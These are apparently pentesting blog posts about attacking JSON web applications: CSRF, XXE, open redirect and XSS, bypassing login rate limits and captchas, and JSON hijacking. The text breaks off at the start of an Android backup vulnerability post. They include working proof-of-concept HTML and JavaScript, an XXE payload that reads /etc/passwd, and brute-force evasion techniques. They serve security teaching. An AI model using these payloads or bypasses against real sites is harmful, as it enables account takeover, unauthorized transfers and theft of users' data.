<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAbRamL_HcKQVJPvB3JJQU0XR3VI6_VANloLT_W_jMiRfvlhqUWUzn21L1ytg2ybKcHJ1SVIsMk9CcJ8bxA36k9LSWj3rSkXeSImizwFqcDgE2LMIB2EHXobK_9vLY5Of16jzL2QueB6c/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAbRamL_HcKQVJPvB3JJQU0XR3VI6_VANloLT_W_jMiRfvlhqUWUzn21L1ytg2ybKcHJ1SVIsMk9CcJ8bxA36k9LSWj3rSkXeSImizwFqcDgE2LMIB2EHXobK_9vLY5Of16jzL2QueB6c/s640/12.png" width="640" /></a></div>
<br />
<br />
<br />
<strong>5. CSRF (Cross Site Request Forgery)</strong><br />
<br />
When we talk about the CSRF in Modern Web Application like JSON Its feel some sticky =D<br />
<br />
CSRF Attack in JSON Application is typically same as we do in normal Pre-Web Application.Here is the example<br />
<br />
POST /site/getuserinfo HTTP/1.1<br />
Host: websecgeeks.com<br />
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0<br />
Content-Type: application/json;<br />
Cookie: ifyoucanthackmeyouarenob=123213kkb2k3bkbk24$$;<br />
<br />
{"id":"1","email":"attacker@attacker.com"}<br />
<br />
<br />
<br />
We can perform the CSRF for this request as mention below.<br />
<html><br />
<form action="" method=post enctype="application/json" method="POST"><br />
<input name='{"id":"1","email":"attacker@attacker.com"}' type='hidden'><br />
<input type=submit><br />
</form><br />
</html><br />
<br />
The enctype should be "application/json" because mostly JSON Application required this type of content to proceed.<br />
<br />
The enctype can be different for different application, The attributes values for enctype is as below<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPTtU5R8veOq32JR9dVIl_erMO5zkTyS_dbjZjmnPSUKvAg7hfa9khw_nwdRPWk8Ms_SwA0tn1hg9gKhgEvX3N74gJHrG91mXxMvcsH0nGmKzfKW2TEL68zK1I0NQxGUuqvRzEY3rTOlc/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPTtU5R8veOq32JR9dVIl_erMO5zkTyS_dbjZjmnPSUKvAg7hfa9khw_nwdRPWk8Ms_SwA0tn1hg9gKhgEvX3N74gJHrG91mXxMvcsH0nGmKzfKW2TEL68zK1I0NQxGUuqvRzEY3rTOlc/s640/1.jpg" width="640" /></a></div>
<br />
<br />
As per my experience this normally dosn`t work.due to JSON tricky nature.SO we use another example which is also given on <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" target="_blank">OWASP</a>, Actually i am going to use the same example of <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" target="_blank">OWASP</a> with some modification.<br />
<br />
So here is our An Example Request<br />
<br />
<strong>POST http://websecgeeks.com/site/transfermoney HTTP/1.1</strong><br />
<br />
<strong>Host:websecgeeks.com</strong><br />
<br />
<strong>Content-Type: application/json</strong><br />
<br />
<strong>Cookie : attackme:"sadasdasd&*&&&&";</strong><br />
<br />
<strong>{ "acct":"BOB", "amount":"100" }</strong><br />
<br />
For performing a CSRF Attack the POC will be look like this according to OWASP<br />
<br />
<strong><html></strong><br />
<strong><body onload="put()"></strong><br />
<strong><script></strong><br />
<strong>function put() {</strong><br />
<strong> var x = new XMLHttpRequest();</strong><br />
<strong> x.open("POST","http://websecgeeks.com/site/transfermoney",true);</strong><br />
<strong> x.setRequestHeader("Content-Type", "application/json"); </strong><br />
<strong> x.send(JSON.stringify({{ "acct":"BOB", "amount":"100" }})); </strong><br />
<strong>}</strong><br />
<strong></script></strong><br />
<br />
<strong></body></strong><br />
<strong></html></strong><br />
<br />
Now how much you are sure that it will work? Any guesses =D , Lets try it out. If we save this page as .html and execute this in authenticated session to test CSRF the http headers will look like this.<br />
<br />
<strong>POST http://websecgeeks.com/site/transfermoney HTTP/1.1</strong><br />
<br />
<strong>Host:websecgeeks.com</strong><br />
<br />
<strong>Content-Type: application/json</strong><br />
<br />
<strong>{ "acct":"BOB", "amount":"100" }</strong><br />
<br />
<br />
<br />
Did you notice something? The authenticated session cookies is not set, Means this request will not work because that is not able to get authenticated and request for internal resources to perform some action.<br />
<h4>
<span style="text-decoration: underline;">"Here is the twist come.We have to add an another header called "<strong>access control allow credentials</strong>" which will instruct the browser to send the cookies related to REQUESTED DOMAIN."</span></h4>
<br />
By default, CORS does not contain cookies on cross-origin requests. This is unlike from other cross-origin techniques.<br />
<br />
CORS require equally the server and the client to recognize that it is fine to contain cookies on requests<br />
The server preserve and may give authorization to include cookies by setting the Access-Control-Allow-Credentialsheader.<br />
<br />
So here i have added the same header by using "<strong>x.withCredentials = true;"</strong><br />
<br />
<strong><html></strong><br />
<strong><body onload="put()"></strong><br />
<strong><script></strong><br />
<strong>function put() {</strong><br />
<strong> var x = new XMLHttpRequest();</strong><br />
<strong> x.open("POST","http://websecgeeks.com/site/transfermoney",true);</strong><br />
<strong> x.setRequestHeader("Content-Type", "application/json"); </strong><br />
<strong> x.withCredentials = true;</strong><br />
<strong> x.send(JSON.stringify({{ "acct":"BOB", "amount":"100" }})); </strong><br />
<strong>}</strong><br />
<strong></script></strong><br />
<br />
<strong></body></strong><br />
<strong></html></strong><br />
<br />
This will be the final POC for JSON CSRF Attack.<br />
<br />
<b>Note- CORS policy is required to set as start "*" to perform cross domain request. Otherwse if CORS policy is set to any specific domain or host. Then server will straight away refuse the attacker cross domain request as untrusted domain/input.</b><br />
<br />
<br />
<br />
<b> 6. XXE ( XML External Entity Injection)</b><br />
<br />
This is a most common attack found in JSON/Modern Web Applications.This application due to improper content type input of user input which allow an attacker to access/read web server local files and well as performing command execution.<br />
<br />
POST /site/getinfo HTTP/1.1<br />
Host: websecgeeks.com<br />
Content-Type: application/json<br />
Content-Length: 38<br />
<br />
{"search":"narendrabhati","value":"noob"}<br />
<br />
<br />
<br />
Now we can send the same request but this time as XML format<br />
<br />
POST /site/getinfo HTTP/1.1<br />
Host: websecgeeks.com<br />
Accept: application/json<br />
<strong>Content-Type: application/xml</strong><br />
Content-Length: 112<br />
<br />
<?xml version="1.0" encoding="UTF-8" ?><br />
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><br />
<root><br />
<search>narendrabhati</search><br />
<value>noob</value><br />
</root><br />
<br />
<br />
<br />
This request will trick the web server to think that user input payload is in XML format and as usual the application dosnt accept this type of data, He will throw an error which might be the actual output of given payload as reading the local files.<br />
<br />
<br />
<br />
<strong>7. Session Management Vulnerabilities.</strong><br />
<br />
Session management vulnerabilities should be check like Session Brute Force , Brute Forcing Tokens, Session Termination, Re-Usability Of Tokens.<br />
<br />
That is all about "Attacking JSON Application : Pentesting JSON Application". If you have any thing which should be updated/edited or have any queries please comment.<br />
<br />
<br />
<br />
<strong>8. Open Redirection/Forwards End Points</strong><br />
<br />
Every open redirection and open forwards end point should be check carefully, Because sometimes you get open redirection or forwards vulnerability which might can also leads to Reflected XSS or Stored XSS, Depends on web application behaviour.<br />
<br />
Here is an Example Of Open Redirection<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic0HI7g-qkyex2yjuaGwuXCAZ3oIbo0nYBT86oRVock8gHr47zelh67Mj7pTJTbzlY-3r7leTVmZd1pJFLnFkhgSx9hBy-rCMZpCEY5NrOa2lAr0C-bEYqNvDcmk9hOMK-1N5e6CYpiss/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic0HI7g-qkyex2yjuaGwuXCAZ3oIbo0nYBT86oRVock8gHr47zelh67Mj7pTJTbzlY-3r7leTVmZd1pJFLnFkhgSx9hBy-rCMZpCEY5NrOa2lAr0C-bEYqNvDcmk9hOMK-1N5e6CYpiss/s640/14.png" width="640" /></a></div>
<br />
<br />
You can see the "newurl" parameter value is reflecting back the value in "javascript" & "href" tag which clearly indicate that, The given value will be execute as top location, So whatever you entered in this parameter Browser will execute it as full location. So now we inject "javascript:alert(1)" in "newurl" parameter which cause the browser to execute the same as full url, result in reflected xss. Example is mention below.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2YMhWrKttMiyj5K6jfPkr88t8cvIx1aheo38z6Q_SN0WIjEqy5IVwAyIS9Et3j8WqkozYIjvIT0y5boHDClNYmr28_JIh71fq1K_SKqZ4k1V3IwN3MFzhmO0QT2NsFovr3V47TZGwvHY/s1600/xss-h1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2YMhWrKttMiyj5K6jfPkr88t8cvIx1aheo38z6Q_SN0WIjEqy5IVwAyIS9Et3j8WqkozYIjvIT0y5boHDClNYmr28_JIh71fq1K_SKqZ4k1V3IwN3MFzhmO0QT2NsFovr3V47TZGwvHY/s640/xss-h1.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRK6McgvDUGU_7bJJeOBYlO0hy7vwlAmlUlCQhFOUST-aCbLJ9aFmW-GK1RlzT0rRrjjT4XIGpMc0DUjspFzD8Zlj4b725uuThKZYbKVAyTp6U3OaE9EczQGVIEC534nFYPe2TRWg6nVA/s1600/xss-domain.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRK6McgvDUGU_7bJJeOBYlO0hy7vwlAmlUlCQhFOUST-aCbLJ9aFmW-GK1RlzT0rRrjjT4XIGpMc0DUjspFzD8Zlj4b725uuThKZYbKVAyTp6U3OaE9EczQGVIEC534nFYPe2TRWg6nVA/s640/xss-domain.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjShDxyKAj_m8sV8CXaWUIyi6AvN0V4JjCEB4Un7QGX7aS4K5Ut58HBOLMIHjlHppOM7sUvkg7DAcvs1ESaarRCwo_J1RbBURFRFt4KTybcohH-uHPwSEwXXoDHRROgsieMlZbdUa9tq1M/s1600/xss-webpage.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjShDxyKAj_m8sV8CXaWUIyi6AvN0V4JjCEB4Un7QGX7aS4K5Ut58HBOLMIHjlHppOM7sUvkg7DAcvs1ESaarRCwo_J1RbBURFRFt4KTybcohH-uHPwSEwXXoDHRROgsieMlZbdUa9tq1M/s640/xss-webpage.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
Thank You ! :)</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com10tag:blogger.com,1999:blog-3462277729309057123.post-3644771247004764362018-06-30T05:43:00.000+05:302019-09-13T13:14:18.118+05:30Bypass Rate Limit Brute Force Protection Login Attempt Protection Captcha Bypass<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnUcamzaKOPRxCR-i9nYsV-8gcoFT2KqBsLAwtZs-IbTigSmjWp3roCX0XBdrxw_0p-v0_jNYSulhL51RY_QonK18BL-XmDI59HeAvzHUsQoH-1TMq7CZV7oi2b6jHr4sYdY1A_hQiPr0/s1600/rate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnUcamzaKOPRxCR-i9nYsV-8gcoFT2KqBsLAwtZs-IbTigSmjWp3roCX0XBdrxw_0p-v0_jNYSulhL51RY_QonK18BL-XmDI59HeAvzHUsQoH-1TMq7CZV7oi2b6jHr4sYdY1A_hQiPr0/s320/rate.jpg" width="320" /></a></div>
<br />
<br />
Hello All While pentesting an application we might face some problem of Brute Force Protection , Login Attempt Protection And Captcha Based Protection , So today we will see how can "Bypass Rate Limit Brute Force Protection Login Attempt Protection Captcha Bypass"<br />
<br />
First of all we will not use any kind of ready made tools for this , So lets begin !<br />
<br />
Many people will think that this is a small issue, But if we look closely an attacker point of view then we will came to know , that By Brute Forcing any login panel can allows an attacker to gain administrative privilege instead of looking for vulnerabilities like RCE , SQL Injection and other critical vulnerability which might also allow us to take the Root or Administrator Level access.<br />
<br />
Here i am describing many different techniques which i have observed while pentesting or hunting bugs.<br />
<br />
<br />
<a name='more'></a><br />
<br />
<strong>1. Using Random User - Agent </strong><br />
<br />
Many web application track the user attempt on the bases of user agent ( Browser ) , So it might be possible to Bypass Rate Limit Brute Force Protection Login Attempt Protection Captcha Bypass By using random User Agent Strings ( <a href="http://pastebin.com/zgvkU0tx" target="_blank">Click Here For User Agent Strings</a> )<br />
<br />
<br />
<br />
<strong>2. Cookies Based Protection</strong><br />
<br />
In my recent Pentesting , i observe that whenever we send multiple login request to web application , then its actually comparing by the cookies values by web server to count our login hit , So if we remove the cookies from every request while performing brute forcing the application then we might be actually "Bypass Rate Limit Brute Force Protection Login Attempt Protection Captcha Bypass"<br />
<br />
<strong>3. The Whole New Iframe Trick</strong><br />
<br />
Be frank i am still not able to know , Why this tricks work , But it is interesting for me.<br />
<br />
Before some month i was pentesting an web application which had couple of roles like admin , write and viewer<br />
<br />
There was a captcha on login panel which bothering me every time while logged in , So i tried to bypass that.<br />
<br />
Dont know what happened , I just load that login page in an Iframe and SHOCK ! the captcha was not there , And then i logged in with only username and password and SHITT ! i was in.<br />
<br />
<br />
<br />
<strong>4. Changing Referrer Value</strong><br />
<br />
I also found that Some web application check referrer to detect our login attempt , So We can simple change the referrer value to any external domain , which will trick the application to think that , We are a new user came from an external domain,So you might be able to "Bypass Rate Limit Brute Force Protection Login Attempt Protection Captcha Bypass"<br />
<br />
<br />
<br />
<strong>5. Mobile Version</strong><br />
<br />
This is an old very known technique , Found by one of my friend.<br />
<br />
Many web application have their mobile version site , Which may lack any kind of login attempt security ,<br />
<br />
You can simple try to access mobile version by google , try to add m.site.com , mobile.site.com and site.com/mobile<br />
<br />
there are many types of URL there you can try them out.<br />
<br />
<br />
<br />
<b>6. Using The Same Captcha</b><br />
<br />
By some miss configuration , Some web application are vulnerable with this , Whenever web application ask you for captcha while login , Simple intercept the request the only change the password or username value where you want to attack and keep the captcha value as before and then attack , You will see that same captcha works for all request.<br />
<br />
<br />
<br />
<strong>7. Time Delay Login Attack</strong><br />
<br />
Some web application detect the login attempt on Time Interval during every login request , So we can set a time delay in our every request which might be "Bypass Brute Force Protection"<br />
<br />
<br />
<br />
<b>8. Changing User Name While Attacking</b><br />
<br />
Some web application login attempt behaviour is depend on which username the attacker is attacking , Like if you will attacker on username "admin" continuously more then 5 times then it will block you directly , To ride out of it , First we have to analysed that after how many attempts on any username application is blocking us , After analysing we can continue our attack with first 4 attempt with valid username and 5th attempt as invalid username , then again next 4 attempt as valid username and then attempts as invalid user name , By using we can also bypass the brute force protection<br />
<br />
Thats all i observe and found , I will update the post asap if i found something more useful things. Thanks<br />
<br />
Comments are always welcome. :)<br />
<br /></div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com4tag:blogger.com,1999:blog-3462277729309057123.post-89827642630937538182018-06-29T17:29:00.000+05:302019-09-13T12:54:51.954+05:30JSON Hijacking<div dir="ltr" style="text-align: left;" trbidi="on">
<h2>
JSON Hijacking</h2>
<br />
<br />
<br />
Today we will see that, How we can find the<br />
JSON Hijacking vulnerability. As we know that this works on older browsers, still we should analyse it because this is a miss-understood/less known vulnerability for many security people. I hope you will like it.<br />
<br />
<br />
<br />
<strong>What is JSON Hijacking?</strong><br />
<br />
JSON Hijacking is similior to CSRF(Cross Site Request Forgery) but there is just a little bit difference, In CSRF you trick the victim/user to do some malicious/unwanted activity but in JSON Hijacking you trick the user to access a crafted link which will read some data form victim account and pass it to attacker.<br />
<br />
<strong>Who Are Affected To This?</strong><br />
<br />
This vulnerability is already fixed in modern browser, Like as of now if victim is using modern browser it cannot be exploited. But still if any one is using an older browser it can be attacked.<br />
<br />
<br />
<strong>How We Can Find JSON Hijacking Vulnerability</strong><br />
<br />
<a name='more'></a><br />
<br />
There are mostly 3 Factors which are required while exploiting JSON Hijacking.<br />
<br />
<strong>1. Compatibility With Old Browser?</strong><br />
<br />
First we should check that, Is targeted application is compatible with Older Browsers.<br />
<br />
<strong>2.</strong> <strong>Access Control Allow Origin Is Present Or Not?</strong><br />
<br />
Access Control Allow Origin header comes in the picture when we talk about modern web applications.<br />
<br />
According To <strong><a href="https://www.owasp.org/index.php/Test_Cross_Origin_Resource_Sharing_(OTG-CLIENT-007)" target="_blank">OWASP </a></strong>- Access-Control-Allow-Origin is a response header used by a server to indicate which domains are allowed to read the response. Based on the CORS W3 Specification it is up to the client to determine and enforce the restriction of whether the client has access to the response data based on this header.<br />
<br />
Basically this header prevent external/third party domain to read application response/data.<br />
<br />
If you look at below HTTP Response, You can see that there is a header called "Access Control Allow Origin " set to a domain name "trusteddomainofselfapplication.com", Means only this domain can access or read data from this application.<br />
<pre>HTTP/1.1 200 OK
Date: Mon, 07 Oct 2013 18:57:53 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u3
Access-Control-Allow-Origin: trusteddomainofselfapplication.com
Content-Length: 4
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: application/json</pre>
<br />
If the "Access Control Allow Origin" is set to a specific domain then JSON Hijacking is not possible, Because we does not have any control on that domain.<br />
<br />
Now look again into below response, As you can see the "Access Control Allow Origin" header is exist but its configure as (star) "*", Means any domain can access his data. This can be called as miss-configured settings.<br />
<pre>HTTP/1.1 200 OK
Date: Mon, 07 Oct 2013 18:57:53 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u3
Access-Control-Allow-Origin: *
Content-Length: 4
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: application/json</pre>
<br />
If "Access Control Allow Origin" header is not there, Then it would become more fine for us to exploit JSON Hijacking.<br />
<br />
<strong>3. Vulnerable JSON Response!</strong><br />
<br />
Typical JSON Request are return some response in an array, it can be look like this.<br />
<pre>[{"id":6,"accountholder":"narendrabhati","accountbalance":"$1000","useremail":"ourvictim@test.com"}]</pre>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNb_8cVS91RW9Q87OAnnGVoJmSMo2dxJJL4SGtMz0FZPsqTYFESl6gTXkGGAvesAW3oPzTYpLplzjoXaQLuC6UObNqW1_jGIzlBz9okQfTgc_R2HAQO1YJDt4zMpEA7oLXlA2V_gDVi0o/s1600/bank-info2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNb_8cVS91RW9Q87OAnnGVoJmSMo2dxJJL4SGtMz0FZPsqTYFESl6gTXkGGAvesAW3oPzTYpLplzjoXaQLuC6UObNqW1_jGIzlBz9okQfTgc_R2HAQO1YJDt4zMpEA7oLXlA2V_gDVi0o/s640/bank-info2.png" width="640" /></a></div>
<br />
<br />
<br />
Which kind of JSON Response Are Vulnerable?<br />
<br />
If you observe below picture, You can see that which kind of JSON Response are vulnerable !<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIkmV8OSt8RqN5iXxLtPlwwzv_-jvDw-15vOzQeQ3I3zwQp3y5eZvOnmjfMPy9YCKQ-1aRrmWXg0keftSo6IAizGwNIlnbt2WHnxNkJQgtAM4FUTDvRppK8euz-Tt9smXtnXZl3nVivko/s1600/vulnerable-response.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIkmV8OSt8RqN5iXxLtPlwwzv_-jvDw-15vOzQeQ3I3zwQp3y5eZvOnmjfMPy9YCKQ-1aRrmWXg0keftSo6IAizGwNIlnbt2WHnxNkJQgtAM4FUTDvRppK8euz-Tt9smXtnXZl3nVivko/s640/vulnerable-response.png" width="640" /></a></div>
<br />
<br />
Vulnerable JSON Response - <a href="https://www.owasp.org/index.php/AJAX_Security_Cheat_Sheet#Protect_against_JSON_Hijacking_for_Older_Browsers" target="_blank">Click Here</a> To See Details[/caption]<br />
<br />
<br />
<br />
<br />
<strong>Vulnerable/Exploitable</strong>:<br />
<br />
[{"object": "inside an array"}]<br />
<br />
========<br />
<br />
<strong>Not Vulnerable/Exploitable</strong><br />
<br />
{"object": "not inside an array"}<br />
========<br />
<br />
<strong>Also not Vulnerable/Exploitable</strong><br />
<br />
{"result": [{"object": "inside an array"}]}<br />
<br />
<br />
<br />
***********<br />
<br />
In our case the JSON Response is like<br />
<pre>[{"id":6,"accountholder":"narendrabhati","accountbalance":"$1000","useremail":"ourvictim@test.com"}]</pre>
<br />
Its kind of vulnerable JSON Response format/syntax.<br />
<br />
<strong>Vulnerable/Exploitable</strong>:<br />
<br />
[{"object": "inside an array"}]<br />
<br />
<br />
<br />
<br />
<br />
<strong>Exploiting The JSON Hijacking!</strong><br />
<br />
After checking all requirements, Now its time to exploit this.<br />
<br />
We can use a code in html format.<br />
<br />
<strong><html xmlns="http://www.w3.org/1999/xhtml" ></strong><br />
<strong><head></strong><br />
<strong> <title>Json Hijacking WebSecurityGeeks</title></strong><br />
<strong></head><body></strong><br />
<strong> <script type="text/javascript"></strong><br />
<strong> Object.prototype.__defineSetter__('accountholder', function (obj) {</strong><br />
<strong> alert('Hijacked Account Holder Name Is '+ obj);</strong><br />
<strong> }); </strong><br />
<strong> </script></strong><br />
<strong> <script type="text/javascript" src="http://websecgeeks.com/bank/home/accountinfo/userdetails"></script></strong><br />
<strong> </body></strong><br />
<strong></html></strong><br />
<br />
We can host this code on public server or a local server as html format according to our requirements.<br />
<br />
If you again look into our JSON Response, You will find that there are many data object like "id" , "accountholder" , accountbalance".<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHpd7e9rELume20l3P9916wJm9p3tqpnIlkMD2MduYcZeVBGdQ-cvKfcOp2cf-EjonF3jAmGdOXPCMrxCBXVUUCn-1_tb__zBrdXRQNvgBHt6usbMq3va7Z1RMObWgl78CwkNmhAy6Qus/s1600/bank-info2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHpd7e9rELume20l3P9916wJm9p3tqpnIlkMD2MduYcZeVBGdQ-cvKfcOp2cf-EjonF3jAmGdOXPCMrxCBXVUUCn-1_tb__zBrdXRQNvgBHt6usbMq3va7Z1RMObWgl78CwkNmhAy6Qus/s640/bank-info2.png" width="640" /></a></div>
<br />
If we want to hijack the details of data object "accountbalance", Then we have to specify the object name in our code at line 6 E.g.<br />
<br />
<strong>Object.prototype.__defineSetter__('accountnbalance', function (obj) {</strong><br />
<br />
As we know its worked on older browser, So I set up an older version 3.0.11 of mozilla firefox.<br />
<br />
Now to create a poc, I am logged into the application, And I am accessing a link which is sent by attacker.<br />
<br />
As you can see the "Account Balance" is hijacked from victims account.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdsCqYHNzy3bIvRgTWhjwedJvTm_IbYnwfwcw2d3T2XCnVHKu5BCBmGMgCJGlS4w_3wj7iLRN0cADLbm1mbDomR_j8yA84PmczDugWjdcE8f7Kk8pKX4tRvdnCbr_5tTIeo4SEhoNCvFk/s1600/hijaced-data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdsCqYHNzy3bIvRgTWhjwedJvTm_IbYnwfwcw2d3T2XCnVHKu5BCBmGMgCJGlS4w_3wj7iLRN0cADLbm1mbDomR_j8yA84PmczDugWjdcE8f7Kk8pKX4tRvdnCbr_5tTIeo4SEhoNCvFk/s640/hijaced-data.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<strong>How To Fix This?</strong><br />
<br />
<br />
<br />
A well documented details are available on <a href="https://www.owasp.org/index.php/AJAX_Security_Cheat_Sheet#Protect_against_JSON_Hijacking_for_Older_Browsers" target="_blank">OWASP</a><br />
<br />
<a href="https://www.owasp.org/index.php/AJAX_Security_Cheat_Sheet#Protect_against_JSON_Hijacking_for_Older_Browsers" target="_blank">https://www.owasp.org/index.php/AJAX_Security_Cheat_Sheet#Protect_against_JSON_Hijacking_for_Older_Browsers</a><br />
<br />
Within this we can also use several things to make it secure.<br />
<br />
<strong>1) <span class="mw-headline" id="Always_return_JSON_with_an_Object_on_the_outside">Always return JSON with an Object on the outside</span></strong><br />
<br />
Always have the outside primitive be an object for JSON strings:<br />
<br />
Vulnerable:<br />
<br />
[{"object": "inside an array"}]<br />
<br />
====<br />
<br />
Not Vulnerable<br />
<br />
{"object": "not inside an array"}<br />
===<br />
<br />
Also not Vulnerable<br />
<br />
{"result": [{"object": "inside an array"}]}<br />
<br />
<br />
<br />
<strong>2) <span class="mw-headline" id="Origin_.26_Access-Control-Allow-Origin">Access-Control-Allow-Origin</span></strong><br />
<br />
Adding "<span class="mw-headline" id="Origin_.26_Access-Control-Allow-Origin">Access-Control-Allow-Origin" will make it un-exploitable because, Out trusted domains are not in control of attacker.</span><br />
<br />
But still we should care, Because attacker can abuse this functionality to exploit this.<br />
<br />
Suppose you have added "anytrusteddomain.com" in "<span class="mw-headline">Access-Control-Allow-Origin". But is there any upload functionality is available which allow user to upload html files, Then attacker can upload his jsonhijack code on this, Now the vulnerability can be exploited even if you have added "</span><span class="mw-headline" id="Origin_.26_Access-Control-Allow-Origin">Access-Control-Allow-Origin".</span><br />
<br />
<br />
<br />
<strong>3) Old Browsers Compatiblity</strong><br />
<br />
This feature can act as mitigation not the prevention,.We can create a mechanism in the application, Which will prevent the users from using our application from an older browsers.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com3tag:blogger.com,1999:blog-3462277729309057123.post-76533325074995170672018-06-29T10:35:00.000+05:302019-09-13T13:04:19.859+05:30Backup Vulnerability Vulnerability Exploitation<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5iLLAMbN1QDjYGFaiCoy3-0uxRmbXCGZAT_753vGm-U9gWy2zpLuFWIXAzonSKj-ceYNcUKsi8qc3lf5GTDqjthcLZ2eV1RuVTquDvTfUWZOU5PGE0XfwNWlvbBoAOhhZIJcYt5CfdqQ/s1600/Screen+Shot+2017-09-05+at+4.08.52+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="657" data-original-width="427" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5iLLAMbN1QDjYGFaiCoy3-0uxRmbXCGZAT_753vGm-U9gWy2zpLuFWIXAzonSKj-ceYNcUKsi8qc3lf5GTDqjthcLZ2eV1RuVTquDvTfUWZOU5PGE0XfwNWlvbBoAOhhZIJcYt5CfdqQ/s320/Screen+Shot+2017-09-05+at+4.08.52+PM.png" width="207" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
cPanel WebDisk Android App 4.0 : Backup Vulnerability</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Hello folks,</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This vulnerability is regarding an Insecure Data Storage & Security Miss-Congiguration, which can be achieve using Android Backup Functionality.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We all know that many of the mobile application stored user credentials or any sensitive data into device itself as clear text format. which ideally not a good practice.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But many of us might know that to access that data we need root privileges or require some special conditions like debugging to be enable. So still if the mobile application is storing sensitive data in clear text its not an issues. Many Security Teams & Bug Bounty Programs Specially exclude this kind of vulnerability where Root/JailBroken conditions required to exploit a vulnerability.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<a name='more'></a><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But what happened, if this data is accessible to a Normal User! Yes No Root Privilege Required.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So start looking what was the conditions I found in cPanel WebDisk Android App 4.0 which leads to PassCode Security Bypass.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
